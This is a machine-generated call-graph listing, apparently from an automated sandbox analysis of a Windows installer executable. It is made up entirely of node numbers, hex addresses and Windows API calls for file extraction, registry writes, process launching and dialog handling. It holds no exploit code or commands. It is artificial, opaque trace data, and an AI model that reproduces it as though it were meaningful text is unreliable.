API calls 5211->5212 5213 402403 5212->5213 5214 402da6 17 API calls 5213->5214 5215 40240c 5214->5215 5216 402da6 17 API calls 5215->5216 5217 402416 GetPrivateProfileStringW 5216->5217 5218 4014f5 SetForegroundWindow 5219 402c2a 5218->5219 5220 7108103d 5221 7108101b 5 API calls 5220->5221 5222 71081056 5221->5222 5223 401ff6 5224 402da6 17 API calls 5223->5224 5225 401ffd 5224->5225 5226 406873 2 API calls 5225->5226 5227 402003 5226->5227 5229 402014 5227->5229 5230 406484 wsprintfW 5227->5230 5230->5229 5231 401b77 5232 402da6 17 API calls 5231->5232 5233 401b7e 5232->5233 5234 402d84 17 API calls 5233->5234 5235 401b87 wsprintfW 5234->5235 5236 402c2a 5235->5236 5237 40167b 5238 402da6 17 API calls 5237->5238 5239 401682 5238->5239 5240 402da6 17 API calls 5239->5240 5241 40168b 5240->5241 5242 402da6 17 API calls 5241->5242 5243 401694 MoveFileW 5242->5243 5244 4016a0 5243->5244 5245 4016a7 5243->5245 5246 401423 24 API calls 5244->5246 5247 406873 2 API calls 5245->5247 5249 4022f6 5245->5249 5246->5249 5248 4016b6 5247->5248 5248->5249 5250 4062fd 36 API calls 5248->5250 5250->5244 5251 4022ff 5252 402da6 17 API calls 5251->5252 5253 402305 5252->5253 5254 402da6 17 API calls 5253->5254 5255 40230e 5254->5255 5256 402da6 17 API calls 5255->5256 5257 402317 5256->5257 5258 406873 2 API calls 5257->5258 5259 402320 5258->5259 5260 402331 lstrlenW lstrlenW 5259->5260 5264 402324 5259->5264 5262 40559f 24 API calls 5260->5262 5261 40559f 24 API calls 5265 40232c 5261->5265 5263 40236f SHFileOperationW 5262->5263 5263->5264 5263->5265 5264->5261 5264->5265 5266 4019ff 5267 402da6 17 API calls 5266->5267 5268 401a06 5267->5268 5269 402da6 17 API calls 5268->5269 5270 401a0f 5269->5270 5271 401a16 lstrcmpiW 5270->5271 5272 401a28 lstrcmpW 5270->5272 5273 401a1c 5271->5273 5272->5273 5274 401000 5275 401037 BeginPaint GetClientRect 5274->5275 5276 40100c DefWindowProcW 5274->5276 5277 4010f3 5275->5277 5279 401179 5276->5279 5280 401073 CreateBrushIndirect FillRect DeleteObject 5277->5280 5281 4010fc 5277->5281 5280->5277 5282 401102 CreateFontIndirectW 5281->5282 5283 401167 EndPaint 5281->5283 5282->5283 5284 401112 6 API calls 5282->5284 5283->5279 5284->5283 5285 401d81 5286 401d94 GetDlgItem 5285->5286 5287 401d87 5285->5287 5288 401d8e 5286->5288 5289 402d84 17 API calls 5287->5289 5290 401dd5 GetClientRect LoadImageW SendMessageW 5288->5290 5291 402da6 17 API calls 5288->5291 5289->5288 5293 401e33 5290->5293 5295 401e3f 5290->5295 5291->5290 5294 401e38 DeleteObject 5293->5294 5293->5295 5294->5295 5296 401503 5297 40150b 5296->5297 5299 40151e 5296->5299 5298 402d84 17 API calls 5297->5298 5298->5299 5300 402383 5301 40239d 5300->5301 5302 40238a 5300->5302 5303 40657a 17 API calls 5302->5303 5304 402397 5303->5304 5304->5301 5305 405b9d MessageBoxIndirectW 5304->5305 5305->5301 5306 402c05 SendMessageW 5307 402c2a 5306->5307 5308 402c1f InvalidateRect 5306->5308 5308->5307 5309 404f06 GetDlgItem GetDlgItem 5310 404f58 7 API calls 5309->5310 5318 40517d 5309->5318 5311 404ff2 SendMessageW 5310->5311 5312 404fff DeleteObject 5310->5312 5311->5312 5313 405008 5312->5313 5314 40503f 5313->5314 5319 40657a 17 API calls 5313->5319 5316 404499 18 API calls 5314->5316 5315 40525f 5317 40530b 5315->5317 5321 405170 5315->5321 5327 4052b8 SendMessageW 5315->5327 5320 405053 5316->5320 5322 405315 SendMessageW 5317->5322 5323 40531d 5317->5323 5318->5315 5343 4051ec 5318->5343 5363 404e54 SendMessageW 5318->5363 5324 405021 SendMessageW SendMessageW 5319->5324 5326 404499 18 API calls 5320->5326 5329 404500 8 API calls 5321->5329 5322->5323 5330 405336 5323->5330 5331 40532f ImageList_Destroy 5323->5331 5338 405346 5323->5338 5324->5313 5344 405064 5326->5344 5327->5321 5333 4052cd SendMessageW 5327->5333 5328 405251 SendMessageW 5328->5315 5334 40550c 5329->5334 5335 40533f GlobalFree 5330->5335 5330->5338 5331->5330 5332 4054c0 5332->5321 5339 4054d2 ShowWindow GetDlgItem ShowWindow 5332->5339 5337 4052e0 5333->5337 5335->5338 5336 40513f GetWindowLongW SetWindowLongW 5340 405158 5336->5340 5348 4052f1 SendMessageW 5337->5348 5338->5332 5353 405381 5338->5353 5368 404ed4 5338->5368 5339->5321 5341 405175 5340->5341 5342 40515d ShowWindow 5340->5342 5362 4044ce SendMessageW 5341->5362 5361 4044ce SendMessageW 5342->5361 5343->5315 5343->5328 5344->5336 5347 4050b7 SendMessageW 5344->5347 5349 40513a 5344->5349 5350 4050f5 SendMessageW 5344->5350 5351 405109 SendMessageW 5344->5351 5347->5344 5348->5317 5349->5336 5349->5340 5350->5344 5351->5344 5356 4053af SendMessageW 5353->5356 5358 4053c5 5353->5358 5354 40548b 5355 405496 InvalidateRect 5354->5355 5357 4054a2 5354->5357 5355->5357 5356->5358 5357->5332 5377 404e0f 5357->5377 5358->5354 5359 405439 SendMessageW SendMessageW 5358->5359 5359->5358 5361->5321 5362->5318 5364 404eb3 SendMessageW 5363->5364 5365 404e77 GetMessagePos ScreenToClient SendMessageW 5363->5365 5367 404eab 5364->5367 5366 404eb0 5365->5366 5365->5367 5366->5364 5367->5343 5380 40653d lstrcpynW 5368->5380 5370 404ee7 5381 406484 wsprintfW 5370->5381 5372 404ef1 5373 40140b 2 API calls 5372->5373 5374 404efa 5373->5374 5382 40653d lstrcpynW 5374->5382 5376 404f01 5376->5353 5383 404d46 5377->5383 5379 404e24 5379->5332 5380->5370 5381->5372 5382->5376 5384 404d5f 5383->5384 5385 40657a 17 API calls 5384->5385 5386 404dc3 5385->5386 5387 40657a 17 API calls 5386->5387 5388 404dce 5387->5388 5389 40657a 17 API calls 5388->5389 5390 404de4 lstrlenW wsprintfW SetDlgItemTextW 5389->5390 5390->5379 5391 404609 lstrlenW 5392 404628 5391->5392 5393 40462a WideCharToMultiByte 5391->5393 5392->5393 4224 40248a 4225 402da6 17 API calls 4224->4225 4226 40249c 4225->4226 4227 402da6 17 API calls 4226->4227 4228 4024a6 4227->4228 4241 402e36 4228->4241 4231 402c2a 4232 4024de 4234 4024ea 4232->4234 4237 402d84 17 API calls 4232->4237 4233 402da6 17 API calls 4236 4024d4 lstrlenW 4233->4236 4235 402509 RegSetValueExW 4234->4235 4245 4032b4 4234->4245 4239 40251f RegCloseKey 4235->4239 4236->4232 4237->4234 4239->4231 4242 402e51 4241->4242 4265 4063d8 4242->4265 4246 4032cd 4245->4246 4247 4032fb 4246->4247 4272 4034e5 SetFilePointer 4246->4272 4269 4034cf 4247->4269 4251 403468 4253 4034aa 4251->4253 4258 40346c 4251->4258 4252 403318 GetTickCount 4254 403452 4252->4254 4261 403367 4252->4261 4255 4034cf ReadFile 4253->4255 4254->4235 4255->4254 4256 4034cf ReadFile 4256->4261 4257 4034cf ReadFile 4257->4258 4258->4254 4258->4257 4259 4060df WriteFile 4258->4259 4259->4258 4260 4033bd GetTickCount 4260->4261 4261->4254 4261->4256 4261->4260 4262 4033e2 MulDiv wsprintfW 4261->4262 4264 4060df WriteFile 4261->4264 4263 40559f 24 API calls 4262->4263 4263->4261 4264->4261 4266 4063e7 4265->4266 4267 4063f2 RegCreateKeyExW 4266->4267 4268 4024b6 4266->4268 4267->4268 4268->4231 4268->4232 4268->4233 4270 4060b0 ReadFile 4269->4270 4271 403306 4270->4271 4271->4251 4271->4252 4271->4254 4272->4247 5394 40498a 5395 4049b6 5394->5395 5396 4049c7 5394->5396 5455 405b81 GetDlgItemTextW 5395->5455 5398 4049d3 GetDlgItem 5396->5398 5405 404a32 5396->5405 5401 4049e7 5398->5401 5399 4049c1 5400 4067c4 5 API calls 5399->5400 5400->5396 5403 4049fb SetWindowTextW 5401->5403 5408 405eb7 4 API calls 5401->5408 5402 404b16 5404 404cc5 5402->5404 5457 405b81 GetDlgItemTextW 5402->5457 5409 404499 18 API calls 5403->5409 5407 404500 8 API calls 5404->5407 5405->5402 5405->5404 5410 40657a 17 API calls 5405->5410 5415 404cd9 5407->5415 5416 4049f1 5408->5416 5412 404a17 5409->5412 5413 404aa6 SHBrowseForFolderW 5410->5413 5411 404b46 5414 405f14 18 API calls 5411->5414 5417 404499 18 API calls 5412->5417 5413->5402 5418 404abe CoTaskMemFree 5413->5418 5419 404b4c 5414->5419 5416->5403 5422 405e0c 3 API calls 5416->5422 5420 404a25 5417->5420 5421 405e0c 3 API calls 5418->5421 5458 40653d lstrcpynW 5419->5458 5456 4044ce SendMessageW 5420->5456 5424 404acb 5421->5424 5422->5403 5427 404b02 SetDlgItemTextW 5424->5427 5431 40657a 17 API calls 5424->5431 5426 404a2b 5429 40690a 5 API calls 5426->5429 5427->5402 5428 404b63 5430 40690a 5 API calls 5428->5430 5429->5405 5438 404b6a 5430->5438 5432 404aea lstrcmpiW 5431->5432 5432->5427 5435 404afb lstrcatW 5432->5435 5433 404bab 5459 40653d lstrcpynW 5433->5459 5435->5427 5436 404bb2 5437 405eb7 4 API calls 5436->5437 5439 404bb8 GetDiskFreeSpaceW 5437->5439 5438->5433 5442 405e58 2 API calls 5438->5442 5444 404c03 5438->5444 5441 404bdc MulDiv 5439->5441 5439->5444 5441->5444 5442->5438 5443 404c74 5446 404c97 5443->5446 5448 40140b 2 API calls 5443->5448 5444->5443 5445 404e0f 20 API calls 5444->5445 5447 404c61 5445->5447 5460 4044bb KiUserCallbackDispatcher 5446->5460 5450 404c76 SetDlgItemTextW 5447->5450 5451 404c66 5447->5451 5448->5446 5450->5443 5453 404d46 20 API calls 5451->5453 5452 404cb3 5452->5404 5454 4048e3 SendMessageW 5452->5454 5453->5443 5454->5404 5455->5399 5456->5426 5457->5411 5458->5428 5459->5436 5460->5452 5461 71082d43 5462 71082d5b 5461->5462 5463 7108162f 2 API calls 5462->5463 5464 71082d76 5463->5464 5465 40290b 5466 402da6 17 API calls 5465->5466 5467 402912 FindFirstFileW 5466->5467 5468 40293a 5467->5468 5472 402925 5467->5472 5469 402943 5468->5469 5473 406484 wsprintfW 5468->5473 5474 40653d lstrcpynW 5469->5474 5473->5469 5474->5472 5475 40190c 5476 401943 5475->5476 5477 402da6 17 API calls 5476->5477 5478 401948 5477->5478 5479 405c49 67 API calls 5478->5479 5480 401951 5479->5480 5481 40190f 5482 402da6 17 API calls 5481->5482 5483 401916 5482->5483 5484 405b9d MessageBoxIndirectW 5483->5484 5485 40191f 5484->5485 5486 71081058 5488 71081074 5486->5488 5487 710810dd 5488->5487 5489 710815b6 GlobalFree 5488->5489 5490 71081092 5488->5490 5489->5490 5491 710815b6 GlobalFree 5490->5491 5492 710810a2 5491->5492 5493 710810a9 GlobalSize 5492->5493 5494 710810b2 5492->5494 5493->5494 5495 710810c7 5494->5495 5496 710810b6 GlobalAlloc 5494->5496 5498 710810d2 GlobalFree 5495->5498 5497 710815dd 3 API calls 5496->5497 5497->5495 5498->5487 4616 402891 4617 402898 4616->4617 4620 402ba9 4616->4620 4618 402d84 17 API calls 4617->4618 4619 40289f 4618->4619 4621 4028ae SetFilePointer 4619->4621 4621->4620 4622 4028be 4621->4622 4624 406484 wsprintfW 4622->4624 4624->4620 5499 401491 5500 40559f 24 API calls 5499->5500 5501 401498 5500->5501 5502 401f12 5503 402da6 17 API calls 5502->5503 5504 401f18 5503->5504 5505 402da6 17 API calls 5504->5505 5506 401f21 5505->5506 5507 402da6 17 API calls 5506->5507 5508 401f2a 5507->5508 5509 402da6 17 API calls 5508->5509 5510 401f33 5509->5510 5511 401423 24 API calls 5510->5511 5512 401f3a 5511->5512 5519 405b63 ShellExecuteExW 5512->5519 5514 401f82 5515 40292e 5514->5515 5516 4069b5 5 API calls 5514->5516 5517 401f9f CloseHandle 5516->5517 5517->5515 5519->5514 5520 405513 5521 405523 5520->5521 5522 405537 5520->5522 5523 405580 5521->5523 5524 405529 5521->5524 5525 40553f IsWindowVisible 5522->5525 5531 405556 5522->5531 5526 405585 CallWindowProcW 5523->5526 5527 4044e5 SendMessageW 5524->5527 5525->5523 5528 40554c 5525->5528 5529 405533 5526->5529 5527->5529 5530 404e54 5 API calls 5528->5530 5530->5531 5531->5526 5532 404ed4 4 API calls 5531->5532 5532->5523 5533 402f93 5534 402fa5 SetTimer 5533->5534 5536 402fbe 5533->5536 5534->5536 5535 403013 5536->5535 5537 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5536->5537 5537->5535 5538 401d17 5539 402d84 17 API calls 5538->5539 5540 401d1d IsWindow 5539->5540 5541 401a20 5540->5541 4830 403f9a 4831 403fb2 4830->4831 4832 404113 4830->4832 4831->4832 4833 403fbe 4831->4833 4834 404124 GetDlgItem GetDlgItem 4832->4834 4853 404164 4832->4853 4835 403fc9 SetWindowPos 4833->4835 4836 403fdc 4833->4836 4837 404499 18 API calls 4834->4837 4835->4836 4839 403fe5 ShowWindow 4836->4839 4840 404027 4836->4840 4841 40414e SetClassLongW 4837->4841 4838 4044e5 SendMessageW 4872 4041d0 4838->4872 4844 404100 4839->4844 4845 404005 GetWindowLongW 4839->4845 4846 404046 4840->4846 4847 40402f DestroyWindow 4840->4847 4848 40140b 2 API calls 4841->4848 4842 4041be 4842->4838 4843 40410e 4842->4843 4912 404500 4844->4912 4845->4844 4851 40401e ShowWindow 4845->4851 4854 40404b SetWindowLongW 4846->4854 4855 40405c 4846->4855 4852 404422 4847->4852 4848->4853 4849 401389 2 API calls 4856 404196 4849->4856 4851->4840 4852->4843 4861 404453 ShowWindow 4852->4861 4853->4842 4853->4849 4854->4843 4855->4844 4860 404068 GetDlgItem 4855->4860 4856->4842 4857 40419a SendMessageW 4856->4857 4857->4843 4858 40140b 2 API calls 4858->4872 4859 404424 DestroyWindow EndDialog 4859->4852 4862 404096 4860->4862 4863 404079 SendMessageW IsWindowEnabled 4860->4863 4861->4843 4865 4040a3 4862->4865 4866 4040ea SendMessageW 4862->4866 4867 4040b6 4862->4867 4876 40409b 4862->4876 4863->4843 4863->4862 4864 40657a 17 API calls 4864->4872 4865->4866 4865->4876 4866->4844 4869 4040d3 4867->4869 4870 4040be 4867->4870 4874 40140b 2 API calls 4869->4874 4873 40140b 2 API calls 4870->4873 4871 4040d1 4871->4844 4872->4843 4872->4858 4872->4859 4872->4864 4875 404499 18 API calls 4872->4875 4894 404364 DestroyWindow 4872->4894 4903 404499 4872->4903 4873->4876 4877 4040da 4874->4877 4875->4872 4909 404472 4876->4909 4877->4844 4877->4876 4879 40424b GetDlgItem 4880 404260 4879->4880 4881 404268 ShowWindow KiUserCallbackDispatcher 4879->4881 4880->4881 4906 4044bb KiUserCallbackDispatcher 4881->4906 4883 404292 EnableWindow 4888 4042a6 4883->4888 4884 4042ab GetSystemMenu EnableMenuItem SendMessageW 4885 4042db SendMessageW 4884->4885 4884->4888 4885->4888 4887 403f7b 18 API calls 4887->4888 4888->4884 4888->4887 4907 4044ce SendMessageW 4888->4907 4908 40653d lstrcpynW 4888->4908 4890 40430a lstrlenW 4891 40657a 17 API calls 4890->4891 4892 404320 SetWindowTextW 4891->4892 4893 401389 2 API calls 4892->4893 4893->4872 4894->4852 4895 40437e CreateDialogParamW 4894->4895 4895->4852 4896 4043b1 4895->4896 4897 404499 18 API calls 4896->4897 4898 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4897->4898 4899 401389 2 API calls 4898->4899 4900 404402 4899->4900 4900->4843 4901 40440a ShowWindow 4900->4901 4902 4044e5 SendMessageW 4901->4902 4902->4852 4904 40657a 17 API calls 4903->4904 4905 4044a4 SetDlgItemTextW 4904->4905 4905->4879 4906->4883 4907->4888 4908->4890 4910 404479 4909->4910 4911 40447f SendMessageW 4909->4911 4910->4911 4911->4871 4913 4045c3 4912->4913 4914 404518 GetWindowLongW 4912->4914 4913->4843 4914->4913 4915 40452d 4914->4915 4915->4913 4916 40455a GetSysColor 4915->4916 4917 40455d 4915->4917 4916->4917 4918 404563 SetTextColor 4917->4918 4919 40456d SetBkMode 4917->4919 4918->4919 4920 404585 GetSysColor 4919->4920 4921 40458b 4919->4921 4920->4921 4922 404592 SetBkColor 4921->4922 4923 40459c 4921->4923 4922->4923 4923->4913 4924 4045b6 CreateBrushIndirect 4923->4924 4925 4045af DeleteObject 4923->4925 4924->4913 4925->4924 5542 401b9b 5543 401bec 5542->5543 5546 401ba8 5542->5546 5544 401bf1 5543->5544 5545 401c16 GlobalAlloc 5543->5545 5556 40239d 5544->5556 5563 40653d lstrcpynW 5544->5563 5549 40657a 17 API calls 5545->5549 5547 401c31 5546->5547 5552 401bbf 5546->5552 5548 40657a 17 API calls 5547->5548 5547->5556 5550 402397 5548->5550 5549->5547 5550->5556 5557 405b9d MessageBoxIndirectW 5550->5557 5561 40653d lstrcpynW 5552->5561 5554 401c03 GlobalFree 5554->5556 5555 401bce 5562 40653d lstrcpynW 5555->5562 5557->5556 5559 401bdd 5564 40653d lstrcpynW 5559->5564 5561->5555 5562->5559 5563->5554 5564->5556 5565 40261c 5566 402da6 17 API calls 5565->5566 5567 402623 5566->5567 5570 40602d GetFileAttributesW CreateFileW 5567->5570 5569 40262f 5570->5569 4990 40259e 4991 402de6 17 API calls 4990->4991 4992 4025a8 4991->4992 4993 402d84 17 API calls 4992->4993 4994 4025b1 4993->4994 4995 40292e 4994->4995 4996 4025d9 RegEnumValueW 4994->4996 4997 4025cd RegEnumKeyW 4994->4997 4998 4025ee RegCloseKey 4996->4998 4997->4998 4998->4995 5571 40149e 5572 4014ac PostQuitMessage 5571->5572 5573 40239d 5571->5573 5572->5573 5574 710823e9 5575 71082453 5574->5575 5576 7108245e GlobalAlloc 5575->5576 5577 7108247d 5575->5577 5576->5575 4192 4015a3 4193 402da6 17 API calls 4192->4193 4194 4015aa SetFileAttributesW 4193->4194 4195 4015bc 4194->4195 4196 401fa4 4197 402da6 17 API calls 4196->4197 4198 401faa 4197->4198 4199 40559f 24 API calls 4198->4199 4200 401fb4 4199->4200 4211 405b20 CreateProcessW 4200->4211 4203 401fdd CloseHandle 4207 40292e 4203->4207 4206 401fcf 4208 401fd4 4206->4208 4209 401fdf 4206->4209 4219 406484 wsprintfW 4208->4219 4209->4203 4212 405b53 CloseHandle 4211->4212 4213 401fba 4211->4213 4212->4213 4213->4203 4213->4207 4214 4069b5 WaitForSingleObject 4213->4214 4215 4069cf 4214->4215 4216 4069e1 GetExitCodeProcess 4215->4216 4220 406946 4215->4220 4216->4206 4219->4203 4221 406963 PeekMessageW 4220->4221 4222 406973 WaitForSingleObject 4221->4222 4223 406959 DispatchMessageW 4221->4223 4222->4215 4223->4221 5578 710810e1 5584 71081111 5578->5584 5579 710812b0 GlobalFree 5580 710811d7 GlobalAlloc 5580->5584 5581 71081240 GlobalFree 5581->5584 5582 7108135a 2 API calls 5582->5584 5583 710812ab 5583->5579 5584->5579 5584->5580 5584->5581 5584->5582 5584->5583 5585 71081312 2 API calls 5584->5585 5586 7108129a GlobalFree 5584->5586 5587 71081381 lstrcpyW 5584->5587 5588 7108116b GlobalAlloc 5584->5588 5585->5584 5586->5584 5587->5584 5588->5584 4273 40252a 4284 402de6 4273->4284 4276 402da6 17 API calls 4277 40253d 4276->4277 4278 402548 RegQueryValueExW 4277->4278 4279 40292e 4277->4279 4280 402568 4278->4280 4283 40256e RegCloseKey 4278->4283 4280->4283 4289 406484 wsprintfW 4280->4289 4283->4279 4285 402da6 17 API calls 4284->4285 4286 402dfd 4285->4286 4287 4063aa RegOpenKeyExW 4286->4287 4288 402534 4287->4288 4288->4276 4289->4283 5589 40202a 5590 402da6 17 API calls 5589->5590 5591 402031 5590->5591 5592 40690a 5 API calls 5591->5592 5593 402040 5592->5593 5594 40205c GlobalAlloc 5593->5594 5597 4020cc 5593->5597 5595 402070 5594->5595 5594->5597 5596 40690a 5 API calls 5595->5596 5598 402077 5596->5598 5599 40690a 5 API calls 5598->5599 5600 402081 5599->5600 5600->5597 5604 406484 wsprintfW 5600->5604 5602 4020ba 5605 406484 wsprintfW 5602->5605 5604->5602 5605->5597 5606 4021aa 5607 402da6 17 API calls 5606->5607 5608 4021b1 5607->5608 5609 402da6 17 API calls 5608->5609 5610 4021bb 5609->5610 5611 402da6 17 API calls 5610->5611 5612 4021c5 5611->5612 5613 402da6 17 API calls 5612->5613 5614 4021cf 5613->5614 5615 402da6 17 API calls 5614->5615 5616 4021d9 5615->5616 5617 402218 CoCreateInstance 5616->5617 5618 402da6 17 API calls 5616->5618 5621 402237 5617->5621 5618->5617 5619 401423 24 API calls 5620 4022f6 5619->5620 5621->5619 5621->5620 5622 403baa 5623 403bb5 5622->5623 5624 403bb9 5623->5624 5625 403bbc GlobalAlloc 5623->5625 5625->5624 4317 40352d SetErrorMode GetVersionExW 4318 4035b7 4317->4318 4319 40357f GetVersionExW 4317->4319 4320 403610 4318->4320 4321 40690a 5 API calls 4318->4321 4319->4318 4322 40689a 3 API calls 4320->4322 4321->4320 4323 403626 lstrlenA 4322->4323 4323->4320 4324 403636 4323->4324 4325 40690a 5 API calls 4324->4325 4326 40363d 4325->4326 4327 40690a 5 API calls 4326->4327 4328 403644 4327->4328 4329 40690a 5 API calls 4328->4329 4330 403650 #17 OleInitialize SHGetFileInfoW 4329->4330 4408 40653d lstrcpynW 4330->4408 4333 40369d GetCommandLineW 4409 40653d lstrcpynW 4333->4409 4335 4036af 4336 405e39 CharNextW 4335->4336 4337 4036d5 CharNextW 4336->4337 4348 4036e6 4337->4348 4338 4037e4 4339 4037f8 GetTempPathW 4338->4339 4410 4034fc 4339->4410 4341 403810 4343 403814 GetWindowsDirectoryW lstrcatW 4341->4343 4344 40386a DeleteFileW 4341->4344 4342 405e39 CharNextW 4342->4348 4346 4034fc 12 API calls 4343->4346 4420 40307d GetTickCount GetModuleFileNameW 4344->4420 4349 403830 4346->4349 4347 40387d 4352 403941 4347->4352 4354 403932 4347->4354 4358 405e39 CharNextW 4347->4358 4348->4338 4348->4342 4351 4037e6 4348->4351 4349->4344 4350 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4349->4350 4353 4034fc 12 API calls 4350->4353 4504 40653d lstrcpynW 4351->4504 4509 403b12 4352->4509 4357 403862 4353->4357 4448 403bec 4354->4448 4357->4344 4357->4352 4375 40389f 4358->4375 4361 403a69 4516 405b9d 4361->4516 4362 403a7e 4364 403a86 GetCurrentProcess OpenProcessToken 4362->4364 4365 403afc ExitProcess 4362->4365 4369 403acc 4364->4369 4370 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4364->4370 4366 403908 4372 405f14 18 API calls 4366->4372 4367 403949 4374 405b08 5 API calls 4367->4374 4373 40690a 5 API calls 4369->4373 4370->4369 4376 403914 4372->4376 4377 403ad3 4373->4377 4378 40394e lstrcatW 4374->4378 4375->4366 4375->4367 4376->4352 4505 40653d lstrcpynW 4376->4505 4379 403ae8 ExitWindowsEx 4377->4379 4384 403af5 4377->4384 4380 40396a lstrcatW lstrcmpiW 4378->4380 4381 40395f lstrcatW 4378->4381 4379->4365 4379->4384 4380->4352 4382 40398a 4380->4382 4381->4380 4385 403996 4382->4385 4386 40398f 4382->4386 4520 40140b 4384->4520 4390 405aeb 2 API calls 4385->4390 4389 405a6e 4 API calls 4386->4389 4387 403927 4506 40653d lstrcpynW 4387->4506 4392 403994 4389->4392 4393 40399b SetCurrentDirectoryW 4390->4393 4392->4393 4394 4039b8 4393->4394 4395 4039ad 4393->4395 4508 40653d lstrcpynW 4394->4508 4507 40653d lstrcpynW 4395->4507 4398 40657a 17 API calls 4399 4039fa DeleteFileW 4398->4399 4400 403a06 CopyFileW 4399->4400 4405 4039c5 4399->4405 4400->4405 4401 403a50 4403 4062fd 36 API calls 4401->4403 4402 4062fd 36 API calls 4402->4405 4403->4352 4404 40657a 17 API calls 4404->4405 4405->4398 4405->4401 4405->4402 4405->4404 4406 405b20 2 API calls 4405->4406 4407 403a3a CloseHandle 4405->4407 4406->4405 4407->4405 4408->4333 4409->4335 4411 4067c4 5 API calls 4410->4411 4413 403508 4411->4413 4412 403512 4412->4341 4413->4412 4414 405e0c 3 API calls 4413->4414 4415 40351a 4414->4415 4416 405aeb 2 API calls 4415->4416 4417 403520 4416->4417 4523 40605c 4417->4523 4527 40602d GetFileAttributesW CreateFileW 4420->4527 4422 4030bd 4440 4030cd 4422->4440 4528 40653d lstrcpynW 4422->4528 4424 4030e3 4425 405e58 2 API calls 4424->4425 4426 4030e9 4425->4426 4529 40653d lstrcpynW 4426->4529 4428 4030f4 GetFileSize 4429 4031ee 4428->4429 4447 40310b 4428->4447 4530 403019 4429->4530 4431 4031f7 4433 403227 GlobalAlloc 4431->4433 4431->4440 4542 4034e5 SetFilePointer 4431->4542 4432 4034cf ReadFile 4432->4447 4541 4034e5 SetFilePointer 4433->4541 4435 40325a 4437 403019 6 API calls 4435->4437 4437->4440 4438 403210 4441 4034cf ReadFile 4438->4441 4439 403242 4442 4032b4 31 API calls 4439->4442 4440->4347 4443 40321b 4441->4443 4445 40324e 4442->4445 4443->4433 4443->4440 4444 403019 6 API calls 4444->4447 4445->4440 4445->4445 4446 40328b SetFilePointer 4445->4446 4446->4440 4447->4429 4447->4432 4447->4435 4447->4440 4447->4444 4449 40690a 5 API calls 4448->4449 4450 403c00 4449->4450 4451 403c06 4450->4451 4452 403c18 4450->4452 4558 406484 wsprintfW 4451->4558 4453 40640b 3 API calls 4452->4453 4454 403c48 4453->4454 4455 403c67 lstrcatW 4454->4455 4457 40640b 3 API calls 4454->4457 4458 403c16 4455->4458 4457->4455 4543 403ec2 4458->4543 4461 405f14 18 API calls 4462 403c99 4461->4462 4463 403d2d 4462->4463 4465 40640b 3 API calls 4462->4465 4464 405f14 18 API calls 4463->4464 4466 403d33 4464->4466 4467 403ccb 4465->4467 4468 403d43 LoadImageW 4466->4468 4471 40657a 17 API calls 4466->4471 4467->4463 4475 403cec lstrlenW 4467->4475 4479 405e39 CharNextW 4467->4479 4469 403de9 4468->4469 4470 403d6a RegisterClassW 4468->4470 4474 40140b 2 API calls 4469->4474 4472 403da0 SystemParametersInfoW CreateWindowExW 4470->4472 4473 403df3 4470->4473 4471->4468 4472->4469 4473->4352 4478 403def 4474->4478 4476 403d20 4475->4476 4477 403cfa lstrcmpiW 4475->4477 4481 405e0c 3 API calls 4476->4481 4477->4476 4480 403d0a GetFileAttributesW 4477->4480 4478->4473 4484 403ec2 18 API calls 4478->4484 4482 403ce9 4479->4482 4483 403d16 4480->4483 4485 403d26 4481->4485 4482->4475 4483->4476 4486 405e58 2 API calls 4483->4486 4487 403e00 4484->4487 4559 40653d lstrcpynW 4485->4559 4486->4476 4489 403e0c ShowWindow 4487->4489 4490 403e8f 4487->4490 4492 40689a 3 API calls 4489->4492 4551 405672 OleInitialize 4490->4551 4494 403e24 4492->4494 4493 403e95 4495 403eb1 4493->4495 4496 403e99 4493->4496 4497 403e32 GetClassInfoW 4494->4497 4499 40689a 3 API calls 4494->4499 4498 40140b 2 API calls 4495->4498 4496->4473 4503 40140b 2 API calls 4496->4503 4500 403e46 GetClassInfoW RegisterClassW 4497->4500 4501 403e5c DialogBoxParamW 4497->4501 4498->4473 4499->4497 4500->4501 4502 40140b 2 API calls 4501->4502 4502->4473 4503->4473 4504->4339 4505->4387 4506->4354 4507->4394 4508->4405 4510 403b2a 4509->4510 4511 403b1c CloseHandle 4509->4511 4571 403b57 4510->4571 4511->4510 4514 405c49 67 API calls 4515 403a5e OleUninitialize 4514->4515 4515->4361 4515->4362 4518 405bb2 4516->4518 4517 403a76 ExitProcess 4518->4517 4519 405bc6 MessageBoxIndirectW 4518->4519 4519->4517 4521 401389 2 API calls 4520->4521 4522 401420 4521->4522 4522->4365 4524 406069 GetTickCount GetTempFileNameW 4523->4524 4525 40352b 4524->4525 4526 40609f 4524->4526 4525->4341 4526->4524 4526->4525 4527->4422 4528->4424 4529->4428 4531 403022 4530->4531 4532 40303a 4530->4532 4533 403032 4531->4533 4534 40302b DestroyWindow 4531->4534 4535 403042 4532->4535 4536 40304a GetTickCount 4532->4536 4533->4431 4534->4533 4537 406946 2 API calls 4535->4537 4538 403058 CreateDialogParamW ShowWindow 4536->4538 4539 40307b 4536->4539 4540 403048 4537->4540 4538->4539 4539->4431 4540->4431 4541->4439 4542->4438 4544 403ed6 4543->4544 4560 406484 wsprintfW 4544->4560 4546 403f47 4561 403f7b 4546->4561 4548 403c77 4548->4461 4549 403f4c 4549->4548 4550 40657a 17 API calls 4549->4550 4550->4549 4564 4044e5 4551->4564 4553 405695 4557 4056bc 4553->4557 4567 401389 4553->4567 4554 4044e5 SendMessageW 4555 4056ce OleUninitialize 4554->4555 4555->4493 4557->4554 4558->4458 4559->4463 4560->4546 4562 40657a 17 API calls 4561->4562 4563 403f89 SetWindowTextW 4562->4563 4563->4549 4565 4044fd 4564->4565 4566 4044ee SendMessageW 4564->4566 4565->4553 4566->4565 4569 401390 4567->4569 4568 4013fe 4568->4553 4569->4568 4570 4013cb MulDiv SendMessageW 4569->4570 4570->4569 4572 403b65 4571->4572 4573 403b2f 4572->4573 4574 403b6a FreeLibrary GlobalFree 4572->4574 4573->4514 4574->4573 4574->4574 5626 401a30 5627 402da6 17 API calls 5626->5627 5628 401a39 ExpandEnvironmentStringsW 5627->5628 5629 401a4d 5628->5629 5631 401a60 5628->5631 5630 401a52 lstrcmpW 5629->5630 5629->5631 5630->5631 5632 71081979 5634 7108199c 5632->5634 5633 710819e3 5636 71081312 2 API calls 5633->5636 5634->5633 5635 710819d1 GlobalFree 5634->5635 5635->5633 5637 71081b6e 